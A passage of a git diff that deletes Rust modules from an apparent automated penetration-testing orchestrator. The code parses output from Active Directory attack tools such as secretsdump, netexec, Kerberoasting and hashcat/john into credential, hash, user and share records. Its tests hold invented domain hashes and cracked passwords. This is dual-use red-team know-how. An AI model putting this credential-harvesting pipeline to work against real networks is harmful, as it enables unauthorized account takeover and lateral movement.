caps.get(3).unwrap().as_str().to_string(); - if is_valid_credential(&user, &pass) { - let key = format!("{}\\{}:{}", domain, user, pass); - if seen.insert(key) { - credentials.push(make_credential( - &user, - &pass, - &domain, - "autologon_registry", - )); - } - } - continue; - } - } - - // Track current domain context (for dedup key and credential domain). - // Only domain is tracked — username tracking was removed to prevent - // stale-context misattribution (LDAP doesn't guarantee attribute order). - if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) { - current_domain = caps.get(1).unwrap().as_str().to_string(); - } else if let Some(caps) = RE_UPN.captures(stripped) { - current_domain = caps.get(2).unwrap().as_str().to_string(); - } - - // Password extraction (only on lines containing "password") - if !stripped.to_lowercase().contains("password") { - continue; - } - - if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { - let password = caps - .get(1) - .unwrap() - .as_str() - .trim_end_matches(|c| ".,;:()".contains(c)) - .trim_matches('\'') - .trim_matches('"') - .to_string(); - - // Extract username from the SAME line only. Never fall back to - // current_user — LDAP doesn't guarantee attribute order, so - // description may appear before sAMAccountName within an entry, - // causing stale current_user from a previous entry to be - // misattributed (e.g. john.smith:Summer2025 instead of - // sam.wilson:Summer2025). Per-tool parsers handle structured - // extraction; this safety net only catches same-line patterns. - let username = if let Some(smb_caps) = RE_SMB_TIMESTAMP_PASSWORD.captures(stripped) { - smb_caps.get(1).unwrap().as_str().to_string() - } else if let Some(smb_caps) = RE_SMB_LINE_PASSWORD.captures(stripped) { - smb_caps.get(1).unwrap().as_str().to_string() - } else if let Some(acct_caps) = RE_ACCOUNT.captures(stripped) { - acct_caps.get(1).unwrap().as_str().to_string() - } else if let Some(bracket_caps) = RE_USER_BRACKET.captures(stripped) { - bracket_caps.get(1).unwrap().as_str().to_string() - } else { - // No same-line username found — skip this password. - // The per-tool parser handles structured extraction. - continue; - }; - - if !username.is_empty() && is_valid_credential(&username, &password) { - let key = format!("{}\\{}:{}", current_domain, username, password); - if seen.insert(key) { - credentials.push(make_credential( - &username, - &password, - ¤t_domain, - "description_field", - )); - } - } - } - } - - credentials -} diff --git a/ares-orchestrator/src/output_extraction/shares.rs b/ares-orchestrator/src/output_extraction/shares.rs deleted file mode 100644 index 99556643..00000000 --- a/ares-orchestrator/src/output_extraction/shares.rs +++ /dev/null @@ -1,80 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::Share; - -static RE_SMB_IP: LazyLock = - LazyLock::new(|| Regex::new(r"^SMB\s+(\d+\.\d+\.\d+\.\d+)\s+").unwrap()); - -static RE_SMB_PREFIX: LazyLock = - LazyLock::new(|| Regex::new(r"^SMB\s+\S+\s+\d+\s+\S+\s+").unwrap()); - -pub fn extract_shares(output: &str) -> Vec { - let mut shares = Vec::new(); - let mut seen = std::collections::HashSet::new(); - let mut current_ip = String::new(); - let mut in_table = false; - let valid_perms = ["read", "write", "read,write", "write,read"]; - - for line in output.lines() { - let stripped = line.trim(); - - // Track current IP - if let Some(caps) = RE_SMB_IP.captures(stripped) { - current_ip = caps.get(1).unwrap().as_str().to_string(); - } - - // Strip SMB prefix to get body - let body = RE_SMB_PREFIX.replace(stripped, "").to_string(); - let body = body.trim(); - - if body.is_empty() { - continue; - } - - // Detect table header - let body_lower = body.to_lowercase(); - if body_lower.starts_with("share") && body_lower.contains("permission") { - in_table = true; - continue; - } - - // Skip separator lines - if body.chars().all(|c| c == '-' || c == ' ') { - continue; - } - - if in_table && !current_ip.is_empty() { - // Table ends at enumeration summary or empty body - if body.starts_with('[') { - in_table = false; - continue; - } - - // Split on whitespace runs (columns are separated by multiple spaces) - let parts: Vec<&str> = body.split_whitespace().collect(); - if parts.len() >= 2 { - let share_name = parts[0].to_string(); - let perm = parts[1].to_lowercase(); - if valid_perms.contains(&perm.as_str()) { - let comment = if parts.len() >= 3 { - parts[2..].join(" ") - } else { - String::new() - }; - let key = format!("{}:{}", current_ip, share_name); - if seen.insert(key) { - shares.push(Share { - host: current_ip.clone(), - name: share_name, - permissions: perm.to_uppercase(), - comment, - }); - } - } - } - } - } - - shares -} diff --git a/ares-orchestrator/src/output_extraction/tests.rs b/ares-orchestrator/src/output_extraction/tests.rs deleted file mode 100644 index 003dc25c..00000000 --- a/ares-orchestrator/src/output_extraction/tests.rs +++ /dev/null @@ -1,538 +0,0 @@ -use super::*; - -#[test] -fn test_extract_ntlm_with_domain() { - let output = - "CONTOSO\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "Administrator"); - assert_eq!(hashes[0].domain, "CONTOSO"); - assert_eq!(hashes[0].hash_type, "ntlm"); - assert!(hashes[0] - .hash_value - .contains("e19ccf75ee54e06b06a5907af13cef42")); -} - -#[test] -fn test_extract_ntlm_without_domain() { - let output = - "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "Administrator"); - assert_eq!(hashes[0].domain, "contoso.local"); -} - -#[test] -fn test_extract_tgs_hash() { - let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "svc_sql"); - assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); - assert_eq!(hashes[0].hash_type, "kerberoast"); -} - -#[test] -fn test_extract_asrep_hash() { - let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456789012345678901234567890abcdef"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "jdoe"); - assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); - assert_eq!(hashes[0].hash_type, "asrep"); -} - -#[test] -fn test_extract_line_wrapped_ntlm() { - let output = - "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75\nee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1); - assert_eq!(hashes[0].username, "Administrator"); -} - -#[test] -fn test_extract_hashes_dedup() { - let output = "\ -CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\n\ -CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; - let hashes = extract_hashes(output, "contoso.local"); - assert_eq!(hashes.len(), 1, "Should dedup identical hashes"); -} - -#[test] -fn test_extract_hosts_banner() { - let output = "SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].ip, "192.168.58.10"); - assert_eq!(hosts[0].hostname, "dc01.contoso.local"); // FQDN constructed from name+domain - assert!(hosts[0].is_dc); -} - -#[test] -fn test_extract_hosts_banner_fqdn_construction() { - // Verify FQDN is built from (name:X)(domain:Y) → x.y - let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:child.contoso.local) (signing:True)"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].hostname, "dc02.child.contoso.local"); - assert!(hosts[0].is_dc); -} - -#[test] -fn test_extract_hosts_banner_domain_trailing_zero() { - // netexec sometimes appends "0." to domain — verify it's stripped - let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:contoso.local0.) (signing:True)"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].hostname, "dc02.contoso.local"); -} - -#[test] -fn test_extract_hosts_simple() { - let output = "SMB 192.168.58.20 445 SRV01 some output"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1); - assert_eq!(hosts[0].ip, "192.168.58.20"); - assert_eq!(hosts[0].hostname, "SRV01"); -} - -#[test] -fn test_extract_hosts_dedup() { - let output = "\ -SMB 192.168.58.10 445 DC01 [*] Windows (name:DC01) (domain:contoso.local)\n\ -SMB 192.168.58.10 445 DC01 something else"; - let hosts = extract_hosts(output); - assert_eq!(hosts.len(), 1, "Should dedup by IP"); - assert_eq!(hosts[0].hostname, "dc01.contoso.local"); -} - -#[test] -fn test_extract_users_domain_backslash() { - let output = "CONTOSO\\alice.johnson (SidTypeUser)"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "alice.johnson"); - assert_eq!(users[0].domain, "CONTOSO"); -} - -#[test] -fn test_extract_users_upn() { - let output = "Found user: bob@contoso.local"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "bob"); - assert_eq!(users[0].domain, "contoso.local"); -} - -#[test] -fn test_extract_users_rpc_format() { - let output = "user:[admin] rid:[0x1f4]"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "admin"); - assert_eq!(users[0].domain, "contoso.local"); -} - -#[test] -fn test_extract_users_samaccountname() { - let output = "sAMAccountName: svc_sql"; - let users = extract_users(output, "contoso.local"); - assert_eq!(users.len(), 1); - assert_eq!(users[0].username, "svc_sql"); -} - -#[test] -fn test_extract_users_skip_machine_accounts() { - let output = "CONTOSO\\DC01$ (SidTypeUser)"; - let users = extract_users(output, "contoso.local"); - assert!( - users.is_empty(), - "Machine accounts (ending in $) should be skipped" - ); -} - -#[test] -fn test_extract_users_skip_anonymous() { - let output = "user:[anonymous] rid:[0x1f5]"; - let users = extract_users(output, "contoso.local"); - assert!(users.is_empty()); -} - -#[test] -fn test_extract_users_smb_timestamp() { - let output = "SMB 192.168.58.10 445 DC01 alice.johnson 2026-03-25 23:21:09 0 Alice"; - let users = extract_users(output, "contoso.local"); - assert!(users.iter().any(|u| u.username == "alice.johnson")); -} - -#[test] -fn test_extract_users_domain_context_propagation() { - let output = "\ -[*] Windows (name:DC01) (domain:north.contoso.local)\n\ -user:[alice] rid:[0x1f4]"; - let users = extract_users(output, "contoso.local"); - let alice = users.iter().find(|u| u.username == "alice").unwrap(); - assert_eq!(alice.domain, "north.contoso.local"); -} - -#[test] -fn test_extract_password_from_description() { - let output = - "SMB 192.168.58.10 445 DC01 dave.miller 2026-03-25 23:22:25 0 Dave Miller (Password : Summer2026!)"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "dave.miller"); - assert_eq!(creds[0].password, "Summer2026!"); -} - -#[test] -fn test_extract_default_password() { - let output = "\ -[*] DefaultPassword\n\ -CONTOSO\\svc_backup:BackupPass123!"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_backup"); - assert_eq!(creds[0].password, "BackupPass123!"); - assert_eq!(creds[0].domain, "CONTOSO"); -} - -#[test] -fn test_extract_password_rejects_paths() { - let output = "Password : /tmp/users.txt"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert!(creds.is_empty()); -} - -/// Regression: stale current_user must never be used for password attribution. -/// Previously, CHILD\john.smith on an earlier line would set current_user, and a -/// later "Password: Summer2025" (belonging to sam.wilson) would be falsely -/// attributed to john.smith. -/// -/// Fix: password lines without a same-line username are skipped entirely. -/// Per-tool parsers handle structured extraction (LDIF, nxc table format). -#[test] -fn test_stale_context_does_not_leak_across_passwords() { - // Simulate secretsdump output followed by LDAP description output - let output = "\ -CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123def456abc123def456abc123de:::\n\ -Password: Summer2025"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - // The password line has no same-line username, so it must be skipped. - // Per-tool parsers handle the structured extraction correctly. - assert!( - creds.is_empty(), - "bare Password: line must not produce credentials" - ); -} - -/// Regression: LDAP attribute order is NOT guaranteed. -/// description may appear BEFORE sAMAccountName within an entry. -/// extract_plaintext_passwords must never misattribute passwords from -/// a previous entry's username context. -#[test] -fn test_ldif_attribute_order_no_misattribution() { - // ldapsearch output where description comes BEFORE sAMAccountName - // and john.smith's entry appears before sam.wilson's - let output = "\ -# john.smith, Users, child.contoso.local\n\ -dn: CN=John Smith,CN=Users,DC=child,DC=contoso,DC=local\n\ -sAMAccountName: john.smith\n\ -description: John Smith\n\ -userPrincipalName: john.smith@child.contoso.local\n\ -\n\ -# sam.wilson, Users, child.contoso.local\n\ -dn: CN=Sam Wilson,CN=Users,DC=child,DC=contoso,DC=local\n\ -description: Sam Wilson (Password : Summer2025)\n\ -sAMAccountName: sam.wilson\n\ -userPrincipalName: sam.wilson@child.contoso.local"; - - let creds = extract_plaintext_passwords(output, "child.contoso.local"); - // The description line has no same-line username — must be skipped. - // john.smith:Summer2025 must NEVER be produced. - assert!( - creds.is_empty(), - "LDIF description without same-line username must not produce credentials, got: {:?}", - creds - ); -} - -/// nxc SMB lines without timestamps should still extract via RE_SMB_LINE_PASSWORD. -#[test] -fn test_smb_line_without_timestamp() { - let output = - "SMB 192.168.58.10 445 DC01 svc_test 0 Service Account (Password : TestPass!)"; - let creds = extract_plaintext_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_test"); - assert_eq!(creds[0].password, "TestPass!"); -} - -/// Ensure that two separate tool outputs processed independently don't -/// cross-contaminate username context. -#[test] -fn test_separate_outputs_no_cross_contamination() { - // Tool output 1: secretsdump mentions john.smith - let output1 = "CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123:::\n"; - // Tool output 2: LDAP description with password for sam.wilson - let output2 = "SMB 192.168.58.22 445 DC02 sam.wilson 2026-04-13 Password: Summer2025"; - - // Process separately (as the fix does) - let creds1 = extract_plaintext_passwords(output1, "contoso.local"); - let creds2 = extract_plaintext_passwords(output2, "contoso.local"); - - // output1 should not produce a plaintext credential (it's a hash line) - assert!(creds1.is_empty()); - - // output2 should attribute Summer2025 to sam.wilson, not john.smith - assert_eq!(creds2.len(), 1); - assert_eq!(creds2[0].username, "sam.wilson"); - assert_eq!(creds2[0].password, "Summer2025"); -} - -#[test] -fn test_extract_shares() { - let output = "\ -SMB 192.168.58.10 445 DC01 Share Permissions Remark\n\ -SMB 192.168.58.10 445 DC01 ----- ----------- ------\n\ -SMB 192.168.58.10 445 DC01 SYSVOL READ Logon server share\n\ -SMB 192.168.58.10 445 DC01 ADMIN$ READ,WRITE\n\ -SMB 192.168.58.10 445 DC01 [*] Enumerated 2 shares"; - let shares = extract_shares(output); - assert_eq!(shares.len(), 2); - assert_eq!(shares[0].name, "SYSVOL"); - assert_eq!(shares[0].permissions, "READ"); - assert_eq!(shares[0].host, "192.168.58.10"); - assert_eq!(shares[1].name, "ADMIN$"); - assert_eq!(shares[1].permissions, "READ,WRITE"); -} - -#[test] -fn test_full_extraction() { - let output = "\ -SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)\n\ -SMB 192.168.58.10 445 DC01 [+] contoso.local\\:\n\ -SMB 192.168.58.10 445 DC01 -Username- -Last PW Set- -BadPW- -Description-\n\ -SMB 192.168.58.10 445 DC01 alice 2026-03-25 23:21:09 0 Alice (Password : Welcome1!)\n\ -SMB 192.168.58.10 445 DC01 bob 2026-03-25 23:21:09 0 Bob\n\ -CONTOSO\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:313b6f423a71d74c0a1b8a2f43b22d4c:::"; - - let result = extract_from_output_text(output, "contoso.local"); - assert!(!result.hosts.is_empty(), "Should extract hosts"); - assert!(!result.users.is_empty(), "Should extract users"); - assert!(!result.credentials.is_empty(), "Should extract credentials"); - assert!(!result.hashes.is_empty(), "Should extract hashes"); -} - -#[test] -fn test_empty_output() { - let result = extract_from_output_text("", "contoso.local"); - assert!(result.is_empty()); -} - -#[test] -fn test_extract_netexec_success_credential() { - let output = "\ -SMB 192.168.58.11 445 DC02 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC02) (domain:child.contoso.local) (signing:True)\n\ -SMB 192.168.58.11 445 DC02 [-] child.contoso.local\\admin:admin STATUS_LOGON_FAILURE\n\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe"; - - let result = extract_from_output_text(output, "child.contoso.local"); - assert_eq!(result.credentials.len(), 1); - assert_eq!(result.credentials[0].username, "jdoe"); - assert_eq!(result.credentials[0].password, "jdoe"); - assert_eq!(result.credentials[0].domain, "child.contoso.local"); - assert_eq!(result.credentials[0].source, "netexec_auth"); -} - -#[test] -fn test_extract_netexec_success_with_pwned() { - let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\Administrator:P@ssw0rd(Pwn3d!)"; - - let result = extract_from_output_text(output, "contoso.local"); - assert_eq!(result.credentials.len(), 1); - assert_eq!(result.credentials[0].username, "Administrator"); - assert_eq!(result.credentials[0].password, "P@ssw0rd"); -} - -#[test] -fn test_extract_netexec_guest_filtered() { - let output = "\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\admin:admin (Guest)\n\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe (Guest)\n\ -SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\realuser:realpass"; - - let result = extract_from_output_text(output, "child.contoso.local"); - assert_eq!( - result.credentials.len(), - 1, - "Guest lines should be filtered out" - ); - assert_eq!(result.credentials[0].username, "realuser"); - assert_eq!(result.credentials[0].password, "realpass"); -} - -#[test] -fn test_valid_credential_rejects_null_usernames() { - assert!(!is_valid_credential("(none)", "pass")); - assert!(!is_valid_credential("none", "pass")); - assert!(!is_valid_credential("null", "pass")); - assert!(!is_valid_credential("(null)", "pass")); - assert!(!is_valid_credential("(None)", "pass")); -} - -#[test] -fn test_valid_credential_rejects_evil_artifacts() { - assert!(!is_valid_credential("EVIL625686$", "pass")); - assert!(!is_valid_credential("evil12345$", "pass")); - // Non-numeric middle should pass - assert!(is_valid_credential("EVILBOT$", "pass")); -} - -#[test] -fn test_valid_credential_rejects_noise_passwords() { - assert!(!is_valid_credential("user", "(null)")); - assert!(!is_valid_credential("user", "*BLANK*")); - assert!(!is_valid_credential("user", "")); - assert!(!is_valid_credential("user", "N/A")); - assert!(!is_valid_credential("user", "[+]")); - assert!(!is_valid_credential("user", "Password")); - assert!(!is_valid_credential("user", "password")); -} - -#[test] -fn test_valid_credential_accepts_real_passwords() { - assert!(is_valid_credential("admin", "P@ss1")); - assert!(is_valid_credential("jdoe", "jdoe")); - assert!(is_valid_credential("svc_test", "svc_test")); -} - -#[test] -fn test_extract_cracked_tgs_hashcat() { - let output = - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456:Summer2024!"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_sql"); - assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); - assert_eq!(creds[0].password, "Summer2024!"); - assert_eq!(creds[0].source, "cracked:hashcat"); -} - -#[test] -fn test_extract_cracked_asrep_hashcat() { - let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456:Winter2024!"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "jdoe"); - assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); - assert_eq!(creds[0].password, "Winter2024!"); - assert_eq!(creds[0].source, "cracked:hashcat"); -} - -#[test] -fn test_extract_cracked_john_show() { - let output = "svc_sql:Summer2024!::::::::\n1 password hash cracked, 0 left"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "svc_sql"); - assert_eq!(creds[0].password, "Summer2024!"); - assert_eq!(creds[0].source, "cracked:john"); -} - -#[test] -fn test_extract_cracked_dedup() { - let output = "\ -$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc:Summer2024!\n\ -$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$def:Summer2024!"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert_eq!(creds.len(), 1, "Should dedup same user@domain"); -} - -#[test] -fn test_extract_cracked_no_false_positives_on_uncracked() { - // Uncracked TGS hash should NOT produce a cracked credential - let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert!( - creds.is_empty(), - "Uncracked hash should not produce credential" - ); -} - -#[test] -fn test_extract_cracked_john_not_triggered_without_context() { - // john --show format should only match if "password hash cracked" context is present - let output = "svc_sql:Summer2024!::::::::"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert!( - creds.is_empty(), - "John format without context should not match" - ); -} - -#[test] -fn test_extract_cracked_asrep_john_show_no_hex() { - // John --show for AS-REP omits the hex hash section - let output = "--- john --show ---\n\ - $krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:letmein2025\n\n\ - 1 password hash cracked, 0 left\n"; - let creds = extract_cracked_passwords(output, "child.contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "brian.davis"); - assert_eq!(creds[0].password, "letmein2025"); - assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); -} - -#[test] -fn test_extract_cracked_tgs_john_show_unknown_user() { - // John --show for TGS shows ?:password — extract user from TGS hash in same output - let output = "Loaded 1 password hash (krb5tgs)\n\ - $krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456\n\ - --- john --show ---\n\ - ?:iknownothing\n\n\ - 1 password hash cracked, 0 left\n"; - let creds = extract_cracked_passwords(output, "child.contoso.local"); - assert_eq!(creds.len(), 1); - assert_eq!(creds[0].username, "john.smith"); - assert_eq!(creds[0].password, "iknownothing"); - assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); - assert_eq!(creds[0].source, "cracked:john"); -} - -#[test] -fn test_extract_cracked_tgs_john_unknown_user_no_hash_context() { - // Without a TGS hash line in the output, ?:password is skipped - let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ - 1 password hash cracked, 0 left\n"; - let creds = extract_cracked_passwords(output, "contoso.local"); - assert!(creds.is_empty(), "No TGS hash context = no credential"); -} - -#[test] -fn test_extract_cracked_no_false_positive_on_raw_asrep_hash() { - // Raw GetNPUsers AS-REP hash should NOT produce a cracked credential. - // The hash body is long hex+$ which is_valid_credential must reject. - let output = "$krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae8410170fd08daf198b9269344aa64b9ad78f3f5b807dee0e8573e3bdec9fd90d0b46fa56baba08708f716d9b43a9f9bb2481ab56453d7a340f60ac478f6114f4fb0db7a424fd075f4cef9061954bf53ac6ac6dc3b0cc153b1bc909cac6cdcad9337022bf24ad2069d1991e9ca6eced54eb31f0016f3d9a2983c7f95c7f92261a8a1c435300576a98943a34046f4c08ecc4c6e81d9ca7aa3ae9a4baeb0e4071cd27c82203a225e741f4867afd15405552a47145ec3d79f1d5d19a90109b24ea593c26169fbccc54816f288a30c08ff34dc11bc105366685769b3edf9027be1dbad2f770edfa3ccd3f9524e93de40033464f07cdefb0"; - let creds = extract_cracked_passwords(output, "child.contoso.local"); - assert!( - creds.is_empty(), - "Raw AS-REP hash body should not be treated as cracked password" - ); -} - -#[test] -fn test_valid_credential_rejects_hash_body_password() { - // Long hex+$ strings should be rejected as hash fragments - assert!(!is_valid_credential( - "brian.davis", - "7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae" - )); - // Short real passwords should still pass - assert!(is_valid_credential("brian.davis", "letmein2025")); -} diff --git a/ares-orchestrator/src/output_extraction/users.rs b/ares-orchestrator/src/output_extraction/users.rs deleted file mode 100644 index 27dfd2f6..00000000 --- a/ares-orchestrator/src/output_extraction/users.rs +++ /dev/null @@ -1,148 +0,0 @@ -use regex::Regex; -use std::sync::LazyLock; - -use ares_core::models::User; - -static RE_DOMAIN_CONTEXT: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)\(domain:([^)]+)\)").unwrap()); - -pub(crate) static RE_DOMAIN_BACKSLASH: LazyLock = - LazyLock::new(|| Regex::new(r"([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+)").unwrap()); - -pub(crate) static RE_UPN: LazyLock = LazyLock::new(|| { - Regex::new(r"([A-Za-z0-9_.\-]+)@([A-Za-z0-9_.\-]+\.[A-Za-z0-9_.\-]+)").unwrap() -}); - -pub(crate) static RE_USER_BRACKET: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)user:\[([^\]]+)\]").unwrap()); - -pub(crate) static RE_ACCOUNT: LazyLock = - LazyLock::new(|| Regex::new(r"Account:\s*([A-Za-z0-9_.\-]+)").unwrap()); - -static RE_SAM: LazyLock = - LazyLock::new(|| Regex::new(r"(?i)samaccountname:\s*([A-Za-z0-9_.\-]+)").unwrap()); - -static RE_SMB_TIMESTAMP: LazyLock = LazyLock::new(|| { - Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() -}); - -/// Reject garbage usernames and invalid domains from regex extraction. -pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { - if username.is_empty() || username.ends_with('$') { - return false; - } - if username.bytes().any(|b| b < 0x20) || domain.bytes().any(|b| b < 0x20) { - return false; - } - if username.len() <= 1 { - return false; - } - let lower = username.to_lowercase(); - const NOISE: &[&str] = &[ - "anonymous", - "none", - "null", - "unknown", - "n/a", - "default", - "test", - "local", - "localhost", - "domain", - "workgroup", - ]; - if NOISE.contains(&lower.as_str()) { - return false; - } - if username.starts_with('_') || domain.starts_with('_') { - return false; - } - if !domain.contains('.') { - if domain.len() > 15 || domain.is_empty() { - return false; - } - if !domain - .bytes() - .all(|b| b.is_ascii_alphanumeric() || b == b'-') - { - return false; - } - } - if !username.bytes().all(|b| b.is_ascii_graphic()) { - return false; - } - true -} - -pub fn extract_users(output: &str, default_domain: &str) -> Vec { - let mut users = Vec::new(); - let mut seen = std::collections::HashSet::new(); - let mut current_domain = default_domain.to_string(); - - for line in output.lines() { - let stripped = line.trim(); - - if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { - current_domain = caps - .get(1) - .unwrap() - .as_str() - .trim_end_matches('.') - .to_string(); - } - - let mut found = Vec::new(); - - if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) { - let dom = caps.get(1).unwrap().as_str(); - let user = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); - } - - if let Some(caps) = RE_UPN.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - let dom = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); - } - - for caps in RE_USER_BRACKET.captures_iter(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - if let Some(caps) = RE_ACCOUNT.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - if let Some(caps) = RE_SAM.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - if let Some(caps) = RE_SMB_TIMESTAMP.captures(stripped) { - let user = caps.get(1).unwrap().as_str(); - found.push((user.to_string(), current_domain.clone())); - } - - for (raw_username, raw_domain) in found { - let username = raw_username.trim().trim_end_matches('.').to_string(); - let domain = raw_domain.trim().trim_end_matches('.').to_string(); - if !is_valid_extracted_user(&username, &domain) { - continue; - } - let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); - if seen.insert(key) { - users.push(User { - username, - domain, - description: String::new(), - is_admin: false, - source: "output_extraction".to_string(), - }); - } - } - } - - users -} diff --git a/ares-orchestrator/src/recovery/dedup.rs b/ares-orchestrator/src/recovery/dedup.rs deleted file mode 100644 index 22da9a39..00000000 --- a/ares-orchestrator/src/recovery/dedup.rs +++ /dev/null @@ -1,273 +0,0 @@ -//! Hash deduplication logic. - -use std::collections::HashSet; - -use tracing::info; - -use ares_core::models::Hash; - -/// Deduplicate hashes, keeping first occurrence. -/// -/// - **AS-REP hashes**: dedup by `(domain.lower(), username.lower())` since -/// each AS-REP request generates a different hash but cracks to the same -/// password. -/// - **Kerberoast/TGS hashes**: dedup by `(domain.lower(), username.lower(), -/// spn_key)` where spn_key is extracted from the hash format. -/// - **NTLM/other hashes**: dedup by exact `hash_value`. -pub fn dedupe_hashes(hashes: Vec) -> Vec { - let mut seen_asrep: HashSet<(String, String)> = HashSet::new(); - let mut seen_kerberoast: HashSet<(String, String, String)> = HashSet::new(); - let mut seen_other: HashSet = HashSet::new(); - let mut result = Vec::with_capacity(hashes.len()); - let original_len = hashes.len(); - - for h in hashes { - let hash_type = h.hash_type.trim().to_lowercase(); - let hash_value = &h.hash_value; - let username = h.username.trim().to_lowercase(); - let domain = h.domain.trim().to_lowercase(); - - let is_asrep = matches!(hash_type.as_str(), "as-rep" | "asrep" | "krb5asrep") - || hash_value.starts_with("$krb5asrep$"); - - let is_kerberoast = matches!( - hash_type.as_str(), - "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" - ) || hash_value.starts_with("$krb5tgs$"); - - if is_asrep { - let key = (domain, username); - if seen_asrep.contains(&key) { - continue; - } - seen_asrep.insert(key); - } else if is_kerberoast 